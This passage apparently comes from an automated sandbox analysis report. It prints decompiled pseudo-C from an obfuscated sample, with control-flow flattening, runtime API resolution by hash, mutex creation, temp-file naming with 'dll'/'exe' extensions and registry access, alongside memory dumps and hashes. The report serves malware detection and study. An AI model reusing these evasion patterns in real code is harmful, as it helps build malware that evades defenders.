                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3805958096-0
                                                                                                                                                        • Opcode ID: d80d32eb1e9112234254cba7eff71140383035e0a19e1f09b03b0e6777551436
                                                                                                                                                        • Instruction ID: 20aadd388a9808094378554f252b68098d913b596e2b683a0d5601751c2a9c6a
                                                                                                                                                        • Opcode Fuzzy Hash: d80d32eb1e9112234254cba7eff71140383035e0a19e1f09b03b0e6777551436
                                                                                                                                                        • Instruction Fuzzy Hash: 0D315F21304D404EDA2046D5A85CF1FAB51F3897E8F14452AFE9EDBB94EA7ED8C28740
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD6965005C, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __isa_available_init.LIBCMT ref: 00007FFD69650079
                                                                                                                                                        • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFD6965007E
                                                                                                                                                          • Part of subcall function 00007FFD69650DD4: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFD69650DD8
                                                                                                                                                          • Part of subcall function 00007FFD69650DD4: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFD69650DDD
                                                                                                                                                          • Part of subcall function 00007FFD69650DD4: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFD69650DE2
                                                                                                                                                        • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFD69650096
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3388242289-0
                                                                                                                                                        • Opcode ID: 47de4b69c5c424f3e0c8bb8d14ec70d0aaa5cd25fe8f1cb13ccdb4e85951ea84
                                                                                                                                                        • Instruction ID: fa95a6c1c26c92edcd274cd080e676e5533e0ab160869497d225c5cef4679c10
                                                                                                                                                        • Opcode Fuzzy Hash: 47de4b69c5c424f3e0c8bb8d14ec70d0aaa5cd25fe8f1cb13ccdb4e85951ea84
                                                                                                                                                        • Instruction Fuzzy Hash: 2AE01A90F0DB82C6FE652EF114722B91A401F2536CF540479D8AD53183CD0EF44A5623
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E005C3A22(long long __rax, intOrPtr __rcx, long long* __rdx) {
				long long _v32;
				intOrPtr _v36;
				signed char _t12;
				void* _t18;
				void* _t26;
				long long _t31;
				long long* _t36;

				_t32 = __rcx;
				_t31 = __rax;
				_t36 = __rdx;
				r8d = 0x7ae3257e;
				r9d = 0x42;
				E005CFAD7(1, _t26, __rax, __rcx);
				 *_t31(); // executed
				_v32 = _t31;
				r8d = 0xce1f1c4e;
				r9d = 0xc5;
				E005CFAD7(1, _t26, _t31, __rcx);
				_v36 =  *_t31();
				_t18 = 0x953bce87;
				L1:
				while(_t18 > 0x346ca2b9) {
					if(_t18 == 0x346ca2ba) {
						r8d = 0x2db58ff7;
						r9d = 0x11;
						E005CFAD7(1, _t26, _t31, _t32);
						_t32 = _v32;
						 *_t31();
						_t18 = 0x6b45cfdb;
						_t12 = 1;
						continue;
					}
					if(_t18 != 0x6b45cfdb) {
						continue;
					}
					return _t12 & 0x00000001;
				}
				if(_t18 == 0x953bce87) {
					_t18 =  ==  ? 0x346ca2ba : 0x263eb76d;
				} else {
					if(_t18 == 0x263eb76d) {
						_t31 = _v32;
						 *_t36 = _t31;
						_t18 = 0x6b45cfdb;
						_t12 = 0;
					}
				}
				goto L1;
			}










                                                                                                                                                        0x005c3a22
                                                                                                                                                        0x005c3a22
                                                                                                                                                        0x005c3a29
                                                                                                                                                        0x005c3a36
                                                                                                                                                        0x005c3a3c
                                                                                                                                                        0x005c3a42
                                                                                                                                                        0x005c3a4e
                                                                                                                                                        0x005c3a50
                                                                                                                                                        0x005c3a5c
                                                                                                                                                        0x005c3a62
                                                                                                                                                        0x005c3a68
                                                                                                                                                        0x005c3a6f
                                                                                                                                                        0x005c3a73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c3a7d
                                                                                                                                                        0x005c3aac
                                                                                                                                                        0x005c3ad8
                                                                                                                                                        0x005c3ade
                                                                                                                                                        0x005c3ae4
                                                                                                                                                        0x005c3ae9
                                                                                                                                                        0x005c3aec
                                                                                                                                                        0x005c3aee
                                                                                                                                                        0x005c3af3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c3af3
                                                                                                                                                        0x005c3ab4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c3b00
                                                                                                                                                        0x005c3b00
                                                                                                                                                        0x005c3a8b
                                                                                                                                                        0x005c3ac7
                                                                                                                                                        0x005c3a8d
                                                                                                                                                        0x005c3a93
                                                                                                                                                        0x005c3a95
                                                                                                                                                        0x005c3a9a
                                                                                                                                                        0x005c3a9d
                                                                                                                                                        0x005c3aa2
                                                                                                                                                        0x005c3aa2
                                                                                                                                                        0x005c3a93
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,005D09DE), ref: 005C3A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                        • String ID: ~%z
                                                                                                                                                        • API String ID: 1964310414-678350322
                                                                                                                                                        • Opcode ID: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction ID: c5fc545bb4341f9aa72c98fba172fddd0388411da4c8e03f5f0d46f711bb9e39
                                                                                                                                                        • Opcode Fuzzy Hash: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction Fuzzy Hash: B8113D323185884AD73C1A956CA1F3D6E93A7997C8F18813DDD4F97F95C81ECE914702
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD69644402, Relevance: 3.1, APIs: 2, Instructions: 67memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.401806986.00007FFD69641000.00000020.00020000.sdmp, Offset: 00007FFD69640000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.401802701.00007FFD69640000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401827279.00007FFD6965A000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401845076.00007FFD6966D000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401851494.00007FFD6966F000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.401855669.00007FFD69671000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                                        • Opcode ID: 332f4c8e41c01c45f60c7ddfa1229c256c647090b7dd4978922d75ca5006f502
                                                                                                                                                        • Instruction ID: dc282cefeb21322a5ae1e923dd071ed0921086bc9afe0edc87b671ab76fa316c
                                                                                                                                                        • Opcode Fuzzy Hash: 332f4c8e41c01c45f60c7ddfa1229c256c647090b7dd4978922d75ca5006f502
                                                                                                                                                        • Instruction Fuzzy Hash: 8D11AF01B49B02C9F9614DDA286273946C1DF85FACFA48436EE0DD76D4DDBCD8874242
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005CA504, Relevance: 1.7, APIs: 1, Instructions: 236COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                        			E005CA504(void* __edx, void* __edi, intOrPtr __ebp, long long __rax, long long __rcx, long long __r9) {
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				void* _v120;
				long long _v128;
				intOrPtr _v132;
				char _v133;
				void* _t50;
				intOrPtr _t69;
				intOrPtr _t88;
				char _t106;
				void* _t114;
				intOrPtr _t115;
				long long _t121;
				long long* _t125;
				long long _t126;
				long long _t144;
				long long _t145;
				long long _t151;

				_t151 = __r9;
				_t121 = __rax;
				_t115 = __ebp;
				_t145 = __rcx;
				E005CCDB9(0x105, __rax);
				_v120 = _t121;
				_t128 = _t145;
				E005C5372(_t121, _t145, _v120);
				_v133 =  *_v120;
				_t144 = _t145 + 0x668;
				_t126 = _t145 + 0x2bc;
				_v72 = _t145 + 0xaf0;
				_v80 = _t145 + 0x76d;
				_t125 = _t145 + 0xbf4;
				_v88 = _t125;
				_t50 = 0x9e14a723;
				L1:
				while(_t50 <= 0x2254ab2) {
					if(_t50 > 0xaf3953e1) {
						if(_t50 <= 0xdc00947b) {
							if(_t50 == 0xd4d47aec) {
								_t125 = _v104;
								_t106 = 0x65;
								 *_t125 = 0x65;
								 *((char*)(_v128 + _t125)) = 0x78;
								L37:
								_t128 = _v128;
								 *((char*)(_v128 + _t125)) = _t106;
								_t50 = 0x2484c110;
								continue;
							}
							if(_t50 != 0xaf3953e2) {
								continue;
							}
							r8d = 2;
							r9d = 0;
							E005C8598(_t125, _t145, _v112, _t151);
							return 1;
						}
						if(_t50 == 0xdc00947c) {
							_t125 = _v104;
							 *_t125 = 0x64;
							_t106 = 0x6c;
							 *((char*)(_v128 + _t125)) = 0x6c;
							goto L37;
						} else {
							if(_t50 == 0xe73f4cf8) {
								_t50 = 0x94522ea1;
								r12b = 1;
							}
							continue;
						}
					} else {
						if(_t50 > 0x94522ea0) {
							if(_t50 == 0x94522ea1) {
								_t50 =  ==  ? 0x29020e8d : 0x2ebd2e8c;
							} else {
								if(_t50 == 0x9e14a723) {
									_t50 =  ==  ? 0xe73f4cf8 : 0x5683ddfd;
								}
							}
						} else {
							if(_t50 == 0x892ff424) {
								r13d = 0;
								r8d = 0x6efba682;
								r9d = 0x84;
								E005CFAD7(1, _t114, _t125, _t128);
								_t88 =  *_t125();
								_t128 = _t126;
								r8d = _t88;
								E005CC96E(_t88, _t126, _v128);
								_t50 = 0x2254ab3;
							} else {
								if(_t50 == 0x8e084d94) {
									_t50 = 0xaf3953e2;
									_v112 = _t144;
								}
							}
						}
						continue;
					}
				}
				if(_t50 <= 0x29020e8c) {
					if(_t50 == 0x2254ab3) {
						_t50 = 0x94522ea1;
						r12d = r13d;
					} else {
						if(_t50 == 0x1793a48b) {
							_t50 = 0x2254ab3;
							r13b = 1;
						} else {
							if(_t50 == 0x2484c110) {
								_t128 = _v80;
								E005C5183(_t115, _t125, _v80, _v128, _t151);
								_t50 =  !=  ? 0x892ff424 : 0x1793a48b;
							}
						}
					}
				} else {
					if(_t50 > 0x315c1774) {
						if(_t50 == 0x315c1775) {
							_t50 = 0xaf3953e2;
							_t128 = _v96;
							_v112 = _v96;
						} else {
							if(_t50 == 0x5683ddfd) {
								E005CCDB9(0x105, _t125);
								_v128 = _t125;
								r8d = 0x26ac9c78;
								r9d = 0x70;
								E005CFAD7(1, _t114, _t125, _t128);
								 *_t125();
								r8d = 0xa3ea1c55;
								r9d = 0x69;
								E005CFAD7(1, _t114, _t125, _t128);
								r8d = _t115;
								_t151 = _v128; // executed
								GetTempFileNameA(??, ??, ??, ??); // executed
								r8d = 0x6efba682;
								r9d = 0x84;
								E005CFAD7(1, _t114, _t125, _v120);
								_v132 =  *_t125() + 0xfffffffd;
								_t50 =  ==  ? 0xd4d47aec : 0xdc00947c;
								_t128 = _v132 + _v128;
								_v104 = _v132 + _v128;
							}
						}
					} else {
						if(_t50 == 0x29020e8d) {
							_v96 = _t126;
							r8d = 0x7328b7e5;
							r9d = 0x59;
							E005CFAD7(1, _t114, _t125, _t128);
							_t128 = _v72;
							 *_t125();
							_t50 =  ==  ? 0x315c1775 : 0x8e084d94;
						} else {
							if(_t50 == 0x2ebd2e8c) {
								r8d = 0x6efba682;
								r9d = 0x84;
								E005CFAD7(1, _t114, _t125, _t128);
								_t69 =  *_t125();
								_t128 = _t126;
								r8d = _t69;
								E005CC96E(_t69, _t126, _t144);
								_t50 = 0x29020e8d;
							}
						}
					}
				}
				goto L1;
			}

























                                                                                                                                                        0x005ca504
                                                                                                                                                        0x005ca504
                                                                                                                                                        0x005ca504
                                                                                                                                                        0x005ca514
                                                                                                                                                        0x005ca51c
                                                                                                                                                        0x005ca521
                                                                                                                                                        0x005ca52b
                                                                                                                                                        0x005ca52e
                                                                                                                                                        0x005ca53a
                                                                                                                                                        0x005ca53e
                                                                                                                                                        0x005ca545
                                                                                                                                                        0x005ca553
                                                                                                                                                        0x005ca55f
                                                                                                                                                        0x005ca564
                                                                                                                                                        0x005ca56b
                                                                                                                                                        0x005ca570
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005ca575
                                                                                                                                                        0x005ca581
                                                                                                                                                        0x005ca612
                                                                                                                                                        0x005ca776
                                                                                                                                                        0x005ca882
                                                                                                                                                        0x005ca887
                                                                                                                                                        0x005ca889
                                                                                                                                                        0x005ca898
                                                                                                                                                        0x005ca89c
                                                                                                                                                        0x005ca8a5
                                                                                                                                                        0x005ca8aa
                                                                                                                                                        0x005ca8ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005ca8ad
                                                                                                                                                        0x005ca781
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005ca8bf
                                                                                                                                                        0x005ca8c5
                                                                                                                                                        0x005ca8c8
                                                                                                                                                        0x005ca8df
                                                                                                                                                        0x005ca8df
                                                                                                                                                        0x005ca61d
                                                                                                                                                        0x005ca81b
                                                                                                                                                        0x005ca820
                                                                                                                                                        0x005ca830
                                                                                                                                                        0x005ca832
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005ca623
                                                                                                                                                        0x005ca628
                                                                                                                                                        0x005ca62e
                                                                                                                                                        0x005ca633
                                                                                                                                                        0x005ca633
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005ca628
                                                                                                                                                        0x005ca587
                                                                                                                                                        0x005ca58c
                                                                                                                                                        0x005ca684
                                                                                                                                                        0x005ca866
                                                                                                                                                        0x005ca68a
                                                                                                                                                        0x005ca68f
                                                                                                                                                        0x005ca6a4
                                                                                                                                                        0x005ca6a4
                                                                                                                                                        0x005ca68f
                                                                                                                                                        0x005ca592
                                                                                                                                                        0x005ca597
                                                                                                                                                        0x005ca791
                                                                                                                                                        0x005ca79b
                                                                                                                                                        0x005ca7a1
                                                                                                                                                        0x005ca7a7
                                                                                                                                                        0x005ca7af
                                                                                                                                                        0x005ca7b6
                                                                                                                                                        0x005ca7b9
                                                                                                                                                        0x005ca7bc
                                                                                                                                                        0x005ca7c1
                                                                                                                                                        0x005ca59d
                                                                                                                                                        0x005ca5a2
                                                                                                                                                        0x005ca5a4
                                                                                                                                                        0x005ca5a9
                                                                                                                                                        0x005ca5a9
                                                                                                                                                        0x005ca5a2
                                                                                                                                                        0x005ca597
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005ca58c
                                                                                                                                                        0x005ca581
                                                                                                                                                        0x005ca5b5
                                                                                                                                                        0x005ca640
                                                                                                                                                        0x005ca837
                                                                                                                                                        0x005ca83c
                                                                                                                                                        0x005ca646
                                                                                                                                                        0x005ca64b
                                                                                                                                                        0x005ca844
                                                                                                                                                        0x005ca849
                                                                                                                                                        0x005ca651
                                                                                                                                                        0x005ca656
                                                                                                                                                        0x005ca661
                                                                                                                                                        0x005ca666
                                                                                                                                                        0x005ca677
                                                                                                                                                        0x005ca677
                                                                                                                                                        0x005ca656
                                                                                                                                                        0x005ca64b
                                                                                                                                                        0x005ca5bb
                                                                                                                                                        0x005ca5c0
                                                                                                                                                        0x005ca6b1
                                                                                                                                                        0x005ca86e
                                                                                                                                                        0x005ca873
                                                                                                                                                        0x005ca878
                                                                                                                                                        0x005ca6b7
                                                                                                                                                        0x005ca6bc
                                                                                                                                                        0x005ca6c7
                                                                                                                                                        0x005ca6cc
                                                                                                                                                        0x005ca6d8
                                                                                                                                                        0x005ca6de
                                                                                                                                                        0x005ca6e4
                                                                                                                                                        0x005ca6e9
                                                                                                                                                        0x005ca6ff
                                                                                                                                                        0x005ca705
                                                                                                                                                        0x005ca70b
                                                                                                                                                        0x005ca718
                                                                                                                                                        0x005ca71b
                                                                                                                                                        0x005ca71e
                                                                                                                                                        0x005ca72c
                                                                                                                                                        0x005ca732
                                                                                                                                                        0x005ca738
                                                                                                                                                        0x005ca745
                                                                                                                                                        0x005ca75a
                                                                                                                                                        0x005ca762
                                                                                                                                                        0x005ca767
                                                                                                                                                        0x005ca767
                                                                                                                                                        0x005ca6bc
                                                                                                                                                        0x005ca5c6
                                                                                                                                                        0x005ca5cb
                                                                                                                                                        0x005ca7cb
                                                                                                                                                        0x005ca7dc
                                                                                                                                                        0x005ca7e2
                                                                                                                                                        0x005ca7e8
                                                                                                                                                        0x005ca7ed
                                                                                                                                                        0x005ca7f5
                                                                                                                                                        0x005ca813
                                                                                                                                                        0x005ca5d1
                                                                                                                                                        0x005ca5d6
                                                                                                                                                        0x005ca5df
                                                                                                                                                        0x005ca5e5
                                                                                                                                                        0x005ca5eb
                                                                                                                                                        0x005ca5f3
                                                                                                                                                        0x005ca5f5
                                                                                                                                                        0x005ca5fb
                                                                                                                                                        0x005ca5fe
                                                                                                                                                        0x005ca603
                                                                                                                                                        0x005ca603
                                                                                                                                                        0x005ca5d6
                                                                                                                                                        0x005ca5cb
                                                                                                                                                        0x005ca5c0
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • GetTempFileNameA.KERNELBASE(?,?,?,?,?,?,?,9FD7756B,079849AE,0701B759,?,?,?,?,005D0BC1), ref: 005CA71E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.399411659.00000000005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                        • Associated: 0000000B.00000002.399402581.00000000005C0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399473393.00000000005D4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000000B.00000002.399490424.00000000005D7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileNameTemp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 745986568-0
                                                                                                                                                        • Opcode ID: c5866a811879c7cfd4a414b43170750b387a4161ebdfd3fad8ee09b49bb46576
                                                                                                                                                        • Instruction ID: 65e3234da23807a54686a448bb8d434b2d266fc2b4b60d826af6db03b7d471b6
                                                                                                                                                        • Opcode Fuzzy Hash: c5866a811879c7cfd4a414b43170750b387a4161ebdfd3fad8ee09b49bb46576
                                                                                                                                                        • Instruction Fuzzy Hash: 2381F8317296448ECF654A95A4D0B6EAFA0F3C5BD8F24441EFE8BD7B69CE29C4418702
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C7B43, Relevance: 1.7, APIs: 1, Instructions: 213registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                        			E005C7B43(intOrPtr __edx, long long __rax, void* __rcx) {
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v112;
				signed long long _v120;
				long long _v128;
				long long _v136;
				intOrPtr _v140;
				long long _v152;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v181;
				long long _v192;
				long long _v200;
				void* _t69;
				intOrPtr _t108;
				long long _t115;
				signed long long _t123;
				intOrPtr* _t131;
				void* _t140;
				void* _t144;
				void* _t146;
				signed long long _t147;
				long long _t148;

				_t115 = __rax;
				_t144 =  &_v168;
				_t108 = __edx;
				_t140 = __rcx;
				E005CCDB9(0xc8, __rax);
				_v152 = _t115;
				_t131 =  &_v180;
				_v136 = _t131;
				 *_t131 = 0;
				_v128 =  &_v160;
				_v88 = _t140 + 0xb44;
				_v96 = _t140 + 0x294;
				_v104 = _t140 + 0x280;
				_v140 = _t108;
				r12d = 0xf11b687f;
				r12d =  ==  ? 0xf83e1c76 : r12d;
				r15d = 0x5c7553b0;
				r15d =  ==  ? 0xdab00bc5 : r15d;
				_t15 = _t140 + 0x5d2; // 0x5c755982
				_v112 = _t15;
				_t17 = _t140 + 0x650; // 0x5c755a00
				_t123 = _t17;
				_v120 = _t123;
				_t69 = 0xbda386ba;
				L1:
				while(1) {
					while(_t69 > 0xdab00bc4) {
						if(_t69 <= 0xf83e1c75) {
							if(_t69 == 0xdab00bc5) {
								 *((short*)(_t140 + 0x294)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x664));
								_t69 = 0x5c7553b0;
								_t147 = _v104;
								_t148 = _v96;
								continue;
							}
							if(_t69 == 0xe6671123) {
								_t69 =  !=  ? 0x9491a652 : 0x1c0ab71e;
								continue;
							}
							if(_t69 != 0xf11b687f) {
								continue;
							}
							L29:
							_t69 = 0xd22e7491;
							continue;
						}
						if(_t69 > 0x38db78b6) {
							if(_t69 == 0x38db78b7) {
								r13d = 0;
								r14d = 0;
								_t69 = r15d;
								continue;
							}
							if(_t69 != 0x5c7553b0) {
								continue;
							}
							_v80 = _t147;
							_v72 = _t148;
							_v176 = 0;
							_v172 = 0x4cf804b1;
							_v168 = 0x5dec0a95;
							_v164 = 0x38ed4ebe;
							if(_v176 != 0) {
								L25:
								E005D020E(_t123, _v152,  &_v172, _v88, _t146);
								r8d = 0x6e0c8ed2;
								r9d = 0xd6;
								E005CFAD7(2, _t108, _t123, _v152);
								_t41 =  &_v160; // 0xf11b68c7
								_v200 = _t41;
								r8d = 0;
								r9d = 0x20019; // executed
								RegOpenKeyExA(??, ??, ??, ??, ??); // executed
								_t131 = _v152;
								E005CCC2E(_t123, _t131);
								_t69 =  ==  ? 0xc40b2334 : 0xbedb4fc6;
								continue;
							}
							do {
								 *(_t144 + 0x38 + _t123 * 4) = ( *(_t144 + 0x38 + _t123 * 4) & 0xfeab8f08 |  !( *(_t144 + 0x38 + _t123 * 4)) & 0x015470f7) ^ 0x39ca1b15;
								_t131 = _t131 + 1;
								_t123 = _t123 + 1;
							} while (_t123 != 4);
							goto L25;
						} else {
							if(_t69 == 0xf83e1c76) {
								 *((intOrPtr*)(_t140 + 0x664)) = _v180;
								_t69 = 0xf11b687f;
							} else {
								if(_t69 == 0x1c0ab71e) {
									_t69 = r12d;
								}
							}
							continue;
						}
					}
					if(_t69 <= 0xbda386b9) {
						if(_t69 == 0x8f6e5d8a) {
							goto L29;
						}
						if(_t69 == 0x9491a652) {
							 *((intOrPtr*)(_t140 + 0x638)) = _v180;
							_t69 = 0xf11b687f;
						} else {
							if(_t69 == 0xa8bc8896) {
								 *((short*)(_t140 + 0x5d2)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x638));
								_t69 = 0x5c7553b0;
								_t147 = _v120;
								_t148 = _v112;
							}
						}
						continue;
					}
					if(_t69 > 0xc40b2333) {
						if(_t69 == 0xc40b2334) {
							r8d = 0xbdd87e1e;
							r9d = 0xde;
							E005CFAD7(2, _t108, _t123, _t131);
							_t60 =  &_v180; // 0xf11b68b3
							_v192 = _t60;
							_v200 = _v72;
							r8d = 0;
							r9d = 0;
							 *_t123();
							r8d = 0x96bc22d6;
							r9d = 0xe0;
							E005CFAD7(2, _t108, _t123, _v160);
							_t131 = _v160;
							 *_t123();
							_t69 =  ==  ? 0xe6671123 : 0x8f6e5d8a;
							continue;
						}
						if(_t69 != 0xd22e7491) {
							continue;
						}
						return _t69;
					}
					if(_t69 == 0xbda386ba) {
						_v181 = _v140 == 1;
						_t69 =  !=  ? 0xa8bc8896 : 0x38db78b7;
						continue;
					}
					if(_t69 != 0xbedb4fc6) {
						continue;
					}
					goto L29;
				}
			}

































                                                                                                                                                        0x005c7b43
                                                                                                                                                        0x005c7b4f
                                                                                                                                                        0x005c7b56
                                                                                                                                                        0x005c7b58
                                                                                                                                                        0x005c7b60
                                                                                                                                                        0x005c7b65
                                                                                                                                                        0x005c7b6a
                                                                                                                                                        0x005c7b6f
                                                                                                                                                        0x005c7b79
                                                                                                                                                        0x005c7b84
                                                                                                                                                        0x005c7b95
                                                                                                                                                        0x005c7ba4
                                                                                                                                                        0x005c7bb3
                                                                                                                                                        0x005c7bbb
                                                                                                                                                        0x005c7bc7
                                                                                                                                                        0x005c7bcd
                                                                                                                                                        0x005c7bd6
                                                                                                                                                        0x005c7bdc
                                                                                                                                                        0x005c7be0
                                                                                                                                                        0x005c7be7
                                                                                                                                                        0x005c7bec
                                                                                                                                                        0x005c7bec
                                                                                                                                                        0x005c7bf3
                                                                                                                                                        0x005c7bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7bfd
                                                                                                                                                        0x005c7bfd
                                                                                                                                                        0x005c7c09
                                                                                                                                                        0x005c7c5b
                                                                                                                                                        0x005c7e0b
                                                                                                                                                        0x005c7e1a
                                                                                                                                                        0x005c7e1e
                                                                                                                                                        0x005c7e23
                                                                                                                                                        0x005c7e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7e2b
                                                                                                                                                        0x005c7c66
                                                                                                                                                        0x005c7e47
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7e47
                                                                                                                                                        0x005c7c71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7dcc
                                                                                                                                                        0x005c7dcc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7dcc
                                                                                                                                                        0x005c7c10
                                                                                                                                                        0x005c7cc5
                                                                                                                                                        0x005c7e63
                                                                                                                                                        0x005c7e66
                                                                                                                                                        0x005c7e69
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7e69
                                                                                                                                                        0x005c7cd0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7cd6
                                                                                                                                                        0x005c7cde
                                                                                                                                                        0x005c7ce8
                                                                                                                                                        0x005c7cec
                                                                                                                                                        0x005c7cf4
                                                                                                                                                        0x005c7cfc
                                                                                                                                                        0x005c7d08
                                                                                                                                                        0x005c7d3d
                                                                                                                                                        0x005c7d4f
                                                                                                                                                        0x005c7d60
                                                                                                                                                        0x005c7d66
                                                                                                                                                        0x005c7d6c
                                                                                                                                                        0x005c7d71
                                                                                                                                                        0x005c7d76
                                                                                                                                                        0x005c7d85
                                                                                                                                                        0x005c7d88
                                                                                                                                                        0x005c7d8e
                                                                                                                                                        0x005c7d93
                                                                                                                                                        0x005c7d98
                                                                                                                                                        0x005c7da9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7da9
                                                                                                                                                        0x005c7d11
                                                                                                                                                        0x005c7d2d
                                                                                                                                                        0x005c7d31
                                                                                                                                                        0x005c7d34
                                                                                                                                                        0x005c7d37
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7c16
                                                                                                                                                        0x005c7c1b
                                                                                                                                                        0x005c7dda
                                                                                                                                                        0x005c7de0
                                                                                                                                                        0x005c7c21
                                                                                                                                                        0x005c7c26
                                                                                                                                                        0x005c7c28
                                                                                                                                                        0x005c7c28
                                                                                                                                                        0x005c7c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7c1b
                                                                                                                                                        0x005c7c10
                                                                                                                                                        0x005c7c32
                                                                                                                                                        0x005c7c7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x005c7c88
                                                                                                                                                        0x005c7e53
                                                                                                                                                        0x005c7e59
